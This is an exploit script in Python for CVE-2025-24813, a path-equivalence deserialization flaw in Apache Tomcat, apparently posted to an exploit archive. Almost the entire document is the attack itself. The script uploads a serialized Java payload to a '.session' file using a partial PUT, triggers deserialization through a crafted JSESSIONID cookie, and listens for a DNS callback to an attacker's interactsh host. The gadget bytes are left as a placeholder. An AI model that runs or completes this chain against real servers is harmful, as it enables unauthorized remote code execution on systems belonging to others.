# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference:
https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
import requests
import random
import string
import sys
def rand_filename(length=6):
return ''.join(random.choices(string.ascii_lowercase, k=length))
def generate_payload(interact_url):
# Java serialized payload gadget triggering DNS interaction
return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or
generator
def exploit(target, interact_url):
filename = rand_filename()
put_url = f"{target}/{filename}.session"
get_url = f"{target}/{filename}"
headers = {
"Content-Range": "bytes 0-452/457",
"Content-Type": "application/octet-stream"
}
payload = generate_payload(interact_url)
print("[+] Exploit for CVE-2025-24813")
print("[+] Made By Al Baradi Joy\n")
print(f"[+] Uploading payload to: {put_url}")
r1 = requests.put(put_url, data=payload, headers=headers)
if r1.status_code == 201:
print("[+] Payload uploaded successfully.")
else:
print(f"[-] Upload failed with status: {r1.status_code}")
return
print(f"[+] Triggering payload via: {get_url}")
cookies = {"JSESSIONID": f".{filename}"}
r2 = requests.get(get_url, cookies=cookies)
print(f"[+] Trigger request sent. Check for DNS callback to:
{interact_url}")
if __name__ == "__main__":
# Display banner first
print("[+] Exploit for CVE-2025-24813")
print("[+] Made By Al Baradi Joy\n")
# Ask the user for the target domain and interact URL
target_url = input("Enter the target domain (e.g., http://localhost:8080):
")
interact_url = input("Enter your interactsh URL: ")
exploit(target_url, interact_url)